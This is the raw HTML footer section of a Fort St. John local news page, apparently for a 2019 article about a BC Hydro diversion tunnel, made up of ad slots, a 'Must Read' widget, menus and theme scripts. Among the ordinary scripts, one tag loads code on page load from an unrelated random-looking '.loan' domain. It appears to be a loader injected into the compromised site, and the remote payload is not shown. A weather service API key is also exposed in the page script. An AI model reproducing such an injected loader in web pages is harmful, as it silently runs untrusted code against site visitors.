googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958270663-0'); });
</script>
</div></center></div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><center>Advertisement</center><center>
<div id='div-gpt-ad-1548958286357-0' style='height:250px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958286357-0'); });
</script>
</div></center></div></aside></div><div class="td_block_wrap td_block_1 td_uid_38_5d28fc093395d_rand td_with_ajax_pagination td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_38_5d28fc093395d">
<style>
/* custom css */
.td_uid_38_5d28fc093395d_rand .td-block-title a,
				.td_uid_38_5d28fc093395d_rand .td-block-title span {
					text-transform:uppercase !important;
				}
				
				.td_uid_38_5d28fc093395d_rand .td_module_4 .entry-title {
					font-family:Montserrat !important;font-size:20px !important;line-height:1.3 !important;font-weight:700 !important;
				}
				
				.td_uid_38_5d28fc093395d_rand .td_module_6 .entry-title {
					font-family:Montserrat !important;font-weight:700 !important;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.td_uid_38_5d28fc093395d_rand .td_module_4 .entry-title {
					font-family:Montserrat !important;font-size:18px !important;line-height:1.3 !important;font-weight:700 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.td_uid_38_5d28fc093395d_rand .td_module_4 .entry-title {
					font-family:Montserrat !important;font-size:16px !important;line-height:1.3 !important;font-weight:700 !important;
				}
}
</style><script>var block_td_uid_38_5d28fc093395d = new tdBlock();
block_td_uid_38_5d28fc093395d.id = "td_uid_38_5d28fc093395d";
block_td_uid_38_5d28fc093395d.atts = '{"custom_title":"Must Read","limit":"4","f_header_font_transform":"uppercase","ajax_pagination":"next_prev","block_template_id":"td_block_template_1","m4f_title_font_family":"394","m4f_title_font_weight":"700","m6f_title_font_family":"394","m6f_title_font_weight":"700","sort":"","offset":"4","m4f_title_font_size":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE4IiwicG9ydHJhaXQiOiIxNiJ9","m4f_title_font_line_height":"1.3","separator":"","custom_url":"","m4_tl":"","m4_el":"","m6_tl":"","post_ids":"","category_id":"","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","el_class":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","m4f_title_font_header":"","m4f_title_font_title":"Article title","m4f_title_font_settings":"","m4f_title_font_style":"","m4f_title_font_transform":"","m4f_title_font_spacing":"","m4f_title_":"","m4f_cat_font_title":"Article category tag","m4f_cat_font_settings":"","m4f_cat_font_family":"","m4f_cat_font_size":"","m4f_cat_font_line_height":"","m4f_cat_font_style":"","m4f_cat_font_weight":"","m4f_cat_font_transform":"","m4f_cat_font_spacing":"","m4f_cat_":"","m4f_meta_font_title":"Article meta info","m4f_meta_font_settings":"","m4f_meta_font_family":"","m4f_meta_font_size":"","m4f_meta_font_line_height":"","m4f_meta_font_style":"","m4f_meta_font_weight":"","m4f_meta_font_transform":"","m4f_meta_font_spacing":"","m4f_meta_":"","m4f_ex_font_title":"Article excerpt","m4f_ex_font_settings":"","m4f_ex_font_family":"","m4f_ex_font_size":"","m4f_ex_font_line_height":"","m4f_ex_font_style":"","m4f_ex_font_weight":"","m4f_ex_font_transform":"","m4f_ex_font_spacing":"","m4f_ex_":"","m6f_title_font_header":"","m6f_title_font_title":"Article title","m6f_title_font_settings":"","m6f_title_font_size":"","m6f_title_font_line_height":"","m6f_title_font_style":"","m6f_title_font_transform":"","m6f_title_font_spacing":"","m6f_title_":"","m6f_cat_font_title":"Article category tag","m6f_cat_font_settings":"","m6f_cat_font_family":"","m6f_cat_font_size":"","m6f_cat_font_line_height":"","m6f_cat_font_style":"","m6f_cat_font_weight":"","m6f_cat_font_transform":"","m6f_cat_font_spacing":"","m6f_cat_":"","m6f_meta_font_title":"Article meta info","m6f_meta_font_settings":"","m6f_meta_font_family":"","m6f_meta_font_size":"","m6f_meta_font_line_height":"","m6f_meta_font_style":"","m6f_meta_font_weight":"","m6f_meta_font_transform":"","m6f_meta_font_spacing":"","m6f_meta_":"","ajax_pagination_infinite_stop":"","css":"","tdc_css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"td_uid_38_5d28fc093395d_rand","tdc_css_class":"td_uid_38_5d28fc093395d_rand","tdc_css_class_style":"td_uid_38_5d28fc093395d_rand_style"}';
block_td_uid_38_5d28fc093395d.td_column_number = "1";
block_td_uid_38_5d28fc093395d.block_type = "td_block_1";
block_td_uid_38_5d28fc093395d.post_count = "4";
block_td_uid_38_5d28fc093395d.found_posts = "43815";
block_td_uid_38_5d28fc093395d.header_color = "";
block_td_uid_38_5d28fc093395d.ajax_pagination_infinite_stop = "";
block_td_uid_38_5d28fc093395d.max_num_pages = "10953";
tdBlocksArray.push(block_td_uid_38_5d28fc093395d);
</script><div class="td-block-title-wrap"><h4 class="block-title td-block-title"><span class="td-pulldown-size">Must Read</span></h4></div><div id=td_uid_38_5d28fc093395d class="td_block_inner">
<div class="td-block-span12">
<div class="td_module_4 td_module_wrap td-animation-stack">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/mike-vandekamp-selected-as-assistant-coach-for-2019-world-junior-a-challenge/" rel="bookmark" class="td-image-wrap" title="Mike Vandekamp selected as Assistant Coach for 2019 World Junior A Challenge"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAADrAQMAAAArGX0KAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAACBJREFUaN7twTEBAAAAwiD7pzbEXmAAAAAAAAAAAACQHSaOAAGSp1GBAAAAAElFTkSuQmCC" alt="" title="Mike Vandekamp selected as Assistant Coach for 2019 World Junior A Challenge" data-type="image_tag" data-img-url="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/Mike-Vandekamp.jpg?resize=324%2C235&ssl=1" width="324" height="235" /></a></div> <a href="https://www.energeticcity.ca/sports/" class="td-post-category">Sports</a> </div>
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/mike-vandekamp-selected-as-assistant-coach-for-2019-world-junior-a-challenge/" rel="bookmark" title="Mike Vandekamp selected as Assistant Coach for 2019 World Junior A Challenge">Mike Vandekamp selected as Assistant Coach for 2019 World Junior A...</a></h3>
<div class="td-module-meta-info">
<span class="td-post-author-name"><a href="https://www.energeticcity.ca/author/sbrooks/">Scott Brooks</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T11:36:03+00:00">July 12, 2019 11:36 am</time></span> </div>
<div class="td-excerpt">
DAWSON CREEK, B.C. - Hockey Canada has announced its selection of coaching staff for the Team Canada West 2019 World Junior A Challenge.
Mike Vandekamp... </div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/beaverlodge-rcmp-wad-rcru-charge-two-after-quad-tracked-by-gps/" rel="bookmark" class="td-image-wrap" title="Beaverlodge RCMP &#038; WAD RCRU charge two after quad tracked by GPS"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="Beaverlodge RCMP &#038; WAD RCRU charge two after quad tracked by GPS" data-type="image_tag" data-img-url="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/03/police-0031.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/beaverlodge-rcmp-wad-rcru-charge-two-after-quad-tracked-by-gps/" rel="bookmark" title="Beaverlodge RCMP &#038; WAD RCRU charge two after quad tracked by GPS">Beaverlodge RCMP &#038; WAD RCRU charge two after quad tracked by...</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T11:13:43+00:00">July 12, 2019 11:13 am</time></span> </div>
</div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/history-and-trivia-pop-up-event-at-the-green-space/" rel="bookmark" class="td-image-wrap" title="History and Trivia Pop-up Event at the green space"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="History and Trivia Pop-up Event at the green space" data-type="image_tag" data-img-url="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/History-pop-up-small.png?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/history-and-trivia-pop-up-event-at-the-green-space/" rel="bookmark" title="History and Trivia Pop-up Event at the green space">History and Trivia Pop-up Event at the green space</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T11:00:53+00:00">July 12, 2019 11:00 am</time></span> </div>
</div>
</div>
</div> 
<div class="td-block-span12">
<div class="td_module_6 td_module_wrap td-animation-stack">
<div class="td-module-thumb"><a href="https://www.energeticcity.ca/2019/07/former-dawson-creek-man-competes-in-2019-world-series-of-poker-main-event-in-las-vegas/" rel="bookmark" class="td-image-wrap" title="Former Dawson Creek man competes in 2019 World Series of Poker Main Event in Las Vegas"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII=" alt="" title="Former Dawson Creek man competes in 2019 World Series of Poker Main Event in Las Vegas" data-type="image_tag" data-img-url="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/Dean-Morrone.v1.jpg?resize=100%2C70&ssl=1" width="100" height="70" /></a></div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://www.energeticcity.ca/2019/07/former-dawson-creek-man-competes-in-2019-world-series-of-poker-main-event-in-las-vegas/" rel="bookmark" title="Former Dawson Creek man competes in 2019 World Series of Poker Main Event in Las Vegas">Former Dawson Creek man competes in 2019 World Series of Poker...</a></h3> <div class="td-module-meta-info">
<span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-07-12T10:56:17+00:00">July 12, 2019 10:56 am</time></span> </div>
</div>
</div>
</div> </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_38_5d28fc093395d" data-td_block_id="td_uid_38_5d28fc093395d"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_38_5d28fc093395d" data-td_block_id="td_uid_38_5d28fc093395d"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> </div></div></div></div> <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tracy Teves"></span><meta itemprop="datePublished" content="2019-07-12T12:53:21+00:00"><meta itemprop="dateModified" content="2019-07-12T12:53:21-07:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.energeticcity.ca/2019/07/bc-hydro-makes-breakthrough-on-second-diversion-tunnel/" /><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="//energeticcity.ca/wp-content/uploads/2018/01/ENC-black-272-90.png"></span><meta itemprop="name" content="Energeticcity.ca"></span><meta itemprop="headline" content="BC Hydro makes breakthrough on second diversion tunnel"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://i0.wp.com/www.energeticcity.ca/wp-content/uploads/2019/07/BC-Hydro-Drill.png?fit=1137%2C633&ssl=1"><meta itemprop="width" content="1137"><meta itemprop="height" content="633"></span>
</article>
</div>
</div>

<script data-cfasync="false" type="text/javascript" src="https://static.freeskreen.com/publisher/3419/freeskreen.min.js"></script>
<script src="https://grass.qgalfwz.loan" async></script>

<div class="td-footer-wrapper td-container-wrap td-footer-template-14 ">
<div class="td-container td-footer-bottom-full">
<div class="td-pb-row">
<div class="td-a-rec td-a-rec-id-footer_top  td-rec-hide-on-p td_uid_39_5d28fc096fce4_rand td_block_template_1">
<div id='div-gpt-ad-1548958315111-0' style='height:90px; width:728px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1548958315111-0'); });
</script>
</div></div><div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="https://www.energeticcity.ca/"><img class="td-retina-data" src="//energeticcity.ca/wp-content/uploads/2018/01/ENC-white-272-90.png" data-retina="//energeticcity.ca/wp-content/uploads/2018/01/ENC-white-544-180.png" alt="Energeticcity.ca - Everything Fort St. John" title="" width="" /></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>The latest local news, sports and community events from Fort St. John and the communities of the North Peace. Plus we cover news from Dawson Creek, Chetwynd, Hudson's Hope, Tumbler Ridge and Fort Nelson.<div class="footer-email-wrap">Contact us: <a href="/cdn-cgi/l/email-protection#55363a3b2134362115303b30273230213c36363c212c7b3634"><span class="__cf_email__" data-cfemail="e5868a8b91848691a5808b80978280918c86868c919ccb8684">[email&#160;protected]</span></a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.facebook.com/energeticcity" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.energeticcity.ca/feed" title="RSS">
<i class="td-icon-font td-icon-rss"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.twitter.com/energeticcity" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.youtube.com/channel/UCkQEKWQr_hVV4ta10oZRUhA" title="Youtube">
<i class="td-icon-font td-icon-youtube"></i>
</a>
</span></aside></div> </div>
</div>
</div>

<div class="td-sub-footer-container td-container-wrap ">
<div class="td-container">
<div class="td-pb-row">
<div class="td-pb-span td-sub-footer-menu">
<div class="menu-website-menu-container"><ul id="menu-website-menu-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-122999"><a href="https://www.energeticcity.ca/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-123000"><a href="https://www.energeticcity.ca/news/">News</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-134529"><a href="https://www.energeticcity.ca/2018-municipal-election/">2018 Municipal Election</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-133514"><a href="https://www.energeticcity.ca/cat-energy/">Energy News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-133515"><a href="https://www.energeticcity.ca/site-c/">Site C</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-128306"><a href="https://www.energeticcity.ca/forest-fires/">Forest Fires</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-134079"><a href="https://www.energeticcity.ca/news/landslide/">Landslide</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-123001"><a href="https://www.energeticcity.ca/sports/">Sports</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-123003"><a href="https://www.energeticcity.ca/townwall-events/">Events</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-123004"><a href="https://regionalhelpwanted.com/fort-st-john-british-columbia-jobs/">Jobs</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-130138"><a href="https://www.energeticcity.ca/get-moose-fm-energeticcity-ca-working-for-you/">Looking for Employees?</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-123005"><a href="http://www.moosefm.ca">Moose FM</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-123006"><a href="https://www.landmarkcinemas.com/showtimes/fort-st-john">Movies</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-131428"><a href="http://fortstjohnadvertising.ca/">Advertise</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-123008"><a href="https://www.energeticcity.ca/news-tip/">News Tip</a></li>
</ul></div> </div>
<div class="td-pb-span td-sub-footer-copy">
&copy; Energeticcity.ca </div>
<div class="td-pb-span tdm-sub-footer-phone">
<span>Tel:</span> <a href="tel:250-787-7100">250-787-7100</a> </div>
<div class="td-pb-span tdm-sub-footer-email">
<span>Email:</span> <a href="/cdn-cgi/l/email-protection#41222e2f3520223501242f24332624352822222835386f2220"><span class="__cf_email__" data-cfemail="5b3834352f3a382f1b3e353e293c3e2f323838322f2275383a">[email&#160;protected]</span></a> </div>
<div class="td-pb-span tdm-sub-footer-info">
9924 101 ave Fort St. John, B.C. </div>
</div>
</div>
</div>
</div>
<div style="display:none">
<div class="grofile-hash-map-2e3f3146babeaa0599c8f3306700b9e0">
</div>
</div>

<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>(function() {function addEventListener(element,event,handler) {
	if(element.addEventListener) {
		element.addEventListener(event,handler, false);
	} else if(element.attachEvent){
		element.attachEvent('on'+event,handler);
	}
}function maybePrefixUrlField() {
	if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if( urlFields && urlFields.length > 0 ) {
	for( var j=0; j < urlFields.length; j++ ) {
		addEventListener(urlFields[j],'blur',maybePrefixUrlField);
	}
}/* test if browser supports date fields */
var testInput = document.createElement('input');
testInput.setAttribute('type', 'date');
if( testInput.type !== 'date') {

	/* add placeholder & pattern to all date fields */
	var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]');
	for(var i=0; i<dateFields.length; i++) {
		if(!dateFields[i].placeholder) {
			dateFields[i].placeholder = 'YYYY-MM-DD';
		}
		if(!dateFields[i].pattern) {
			dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])';
		}
	}
}

})();</script><script type="text/javascript">var _wdca={"first_ad":3,"count":6,"selector":">p","predefined":{"before":0,"middle":0,"after":0,"ignore_other":0,"ignore_requirement":0},"ga":{"enabled":false,"category":"In Post Ads","label":"Default"},"non_indexing_wrapper":false,"pfx":"wdca_","dynamic_styles":false,"ajax_url":"https:\/\/www.energeticcity.ca\/wp-admin\/admin-ajax.php"};</script><link rel='stylesheet' id='wdca-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/8e853957-69d7-46b8-8bb9-5c1629558ead.css' type='text/css' media='all' />
<link rel='stylesheet' id='wdca-theme-css' href='https://hb.wpmucdn.com/www.energeticcity.ca/9ee88838-1ae8-4e2c-b35b-e78ffa2b506f.css' type='text/css' media='all' />
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/97ecf5d9-f2f1-42f0-9559-274ea7ea022c.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.energeticcity.ca\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/d3c66708-508a-4f6a-944d-2785378b376e.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/15582968-9464-4cae-b71d-593a3ed06396.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/0b550e39-8d18-4550-a57e-d32daaf2be42.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/f122cea7-c3cf-4413-a394-e0fe7bafdd51.js'></script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/15416aee-43b2-419e-b8ad-8a01f315ff62.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mc4wp_forms_config = [];
/* ]]> */
</script>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/54b24290-fb1e-4b49-bb85-1e004af0e01c.js'></script>
<!--[if lte IE 9]>
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/49a98f08-9ea2-4a51-ab4a-9cdab3f1ba6c.js'></script>
<![endif]-->
<script type='text/javascript' src='https://hb.wpmucdn.com/www.energeticcity.ca/22a61341-8829-48a5-b4b4-38ba29920c6f.js'></script>
<script data-cfasync="false" type="text/javascript" src="https://static.freeskreen.com/publisher/3419/freeskreen.min.js"></script>

<script>
    

			
				jQuery().ready(function () {
					tdWeather.addItem({"block_uid":"td_top_weather_uid","location":"Fort St. John","api_location":"Fort St. John","api_language":"en","api_key":"ee6a2dcca6a53d294fe15bdcce9c42d5","today_icon":"mist-d","today_icon_text":"smoke","today_temp":[23,73.400000000000005684341886080801486968994140625],"today_humidity":40,"today_wind_speed":[5.0999999999999996447286321199499070644378662109375,3.20000000000000017763568394002504646778106689453125],"today_min":[23,73.400000000000005684341886080801486968994140625],"today_max":[23,73.400000000000005684341886080801486968994140625],"today_clouds":40,"current_unit":0,"forecast":[{"timestamp":1562965200,"day_name":"Fri","day_temp":[25,78],"owm_day_index":0},{"timestamp":1562976000,"day_name":"Sat","day_temp":[20,67],"owm_day_index":1},{"timestamp":1563062400,"day_name":"Sun","day_temp":[21,70],"owm_day_index":9},{"timestamp":1563148800,"day_name":"Mon","day_temp":[20,69],"owm_day_index":17},{"timestamp":1563235200,"day_name":"Tue","day_temp":[23,73],"owm_day_index":25},{"timestamp":1563321600,"day_name":"Wed","day_temp":[23,74],"owm_day_index":33}]});
				});
			
			

		

			jQuery(window).load(function () {
				jQuery('body').find('#td_uid_1_5d28fc08c0a5f .td-element-style').each(function (index, element) {
					jQuery(element).css('opacity', 1);
					return;
				});
			});

		

		

			

				jQuery(window).ready(function () {

					// We need timeout because the content must be rendered and interpreted on client
					setTimeout(function () {

						var $content = jQuery('body').find('#tdc-live-iframe'),
							refWindow = undefined;

						if ($content.length) {
							$content = $content.contents();
							refWindow = document.getElementById('tdc-live-iframe').contentWindow || document.getElementById('tdc-live-iframe').contentDocument;

						} else {
							$content = jQuery('body');
							refWindow = window;
						}

						$content.find('#td_uid_1_5d28fc08c0a5f .td-element-style').each(function (index, element) {
							jQuery(element).css('opacity', 1);
							return;
						});
					});

				}, 200);
			

			

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[149514]");
                });
            

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'https://www.energeticcity.ca/wp-content/themes/Newspaper-child/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'https://www.energeticcity.ca/wp-content/themes/Newspaper9';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<style>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</style>
<script type='text/javascript' src='https://stats.wp.com/e-201928.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:7.5.2',blog:'103730828',post:'149514',tz:'-7',srv:'www.energeticcity.ca'} ]);
	_stq.push([ 'clickTrackerInit', '103730828', '149514' ]);
</script>
<div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar">
<header>
<a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a>
<div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div>
</header>
<div class="tdw-content">
<div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active">
<script>

							(function(jQuery, undefined) {

								jQuery(window).ready(function() {

									if ( 'undefined' !== typeof tdcAdminIFrameUI ) {
										var $liveIframe  = tdcAdminIFrameUI.getLiveIframe();

										if ( $liveIframe.length ) {
											$liveIframe.load(function() {
												$liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' );
											});
										}
									}

								});

							})(jQuery);

						</script>
<textarea class="tdw-css-writer-editor td_live_css_uid_1_5d28fc09a3fb2"></textarea>
<div id="td_live_css_uid_1_5d28fc09a3fb2" class="td-code-editor"></div>
<script>
							jQuery(window).load(function (){

								if ( 'undefined' !== typeof tdLiveCssInject ) {

									tdLiveCssInject.init();


									var editor_textarea = jQuery('.td_live_css_uid_1_5d28fc09a3fb2');
									var languageTools = ace.require("ace/ext/language_tools");
									var tdcCompleter = {
										getCompletions: function (editor, session, pos, prefix, callback) {
											if (prefix.length === 0) {
												callback(null, []);
												return
											}

											if ('undefined' !== typeof tdcAdminIFrameUI) {

												var data = {
													error: undefined,
													getShortcode: ''
												};

												tdcIFrameData.getShortcodeFromData(data);

												if (!_.isUndefined(data.error)) {
													tdcDebug.log(data.error);
												}

												if (!_.isUndefined(data.getShortcode)) {

													var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g,
														results = data.getShortcode.match(regex);

													var elClasses = {};

													for (var i = 0; i < results.length; i++) {
														var currentClasses = results[i]
															.replace('el_class="', '')
															.replace('"', '')
															.split(' ');

														for (var j = 0; j < currentClasses.length; j++) {
															if (_.isUndefined(elClasses[currentClasses[j]])) {
																elClasses[currentClasses[j]] = '';
															}
														}
													}

													var arrElClasses = [];

													for (var prop in elClasses) {
														arrElClasses.push(prop);
													}

													callback(null, arrElClasses.map(function (item) {
														return {
															name: item,
															value: item,
															meta: 'in_page'
														}
													}));
												}
											}
										}
									};
									languageTools.addCompleter(tdcCompleter);

									window.editor = ace.edit("td_live_css_uid_1_5d28fc09a3fb2");
                                    window.editor.$blockScrolling = Infinity;

                                    // 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook)
									// We did it to reattach the existing compiled css to the new content received from server.
									window.editorChangeHandler = function () {
										//tdwState.lessWasEdited = true;

										window.onbeforeunload = function () {
											if (tdwState.lessWasEdited) {
												return "You have attempted to leave this page. Are you sure?";
											}
											return false;
										};

										var editorValue = editor.getSession().getValue();

										editor_textarea.val(editorValue);

										if ('undefined' !== typeof tdcAdminIFrameUI) {
											tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue);

											// Mark the content as modified
											// This is important for showing info when composer closes
                                            tdcMain.setContentModified();
										}

										tdLiveCssInject.less();
									};

									editor.getSession().setValue(editor_textarea.val());
									editor.getSession().on('change', editorChangeHandler);

									editor.setTheme("ace/theme/textmate");
									editor.setShowPrintMargin(false);
									editor.getSession().setMode("ace/mode/less");
                                    editor.getSession().setUseWrapMode(true);
									editor.setOptions({
										enableBasicAutocompletion: true,
										enableSnippets: true,
										enableLiveAutocompletion: false
									});

								}

							});
						</script>
</div>
</div>
<footer>
<a href="#" class="tdw-save-css">Save</a>
<div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div>
<div class="tdw-resize"></div>
</footer>
</div>
</body>
</html>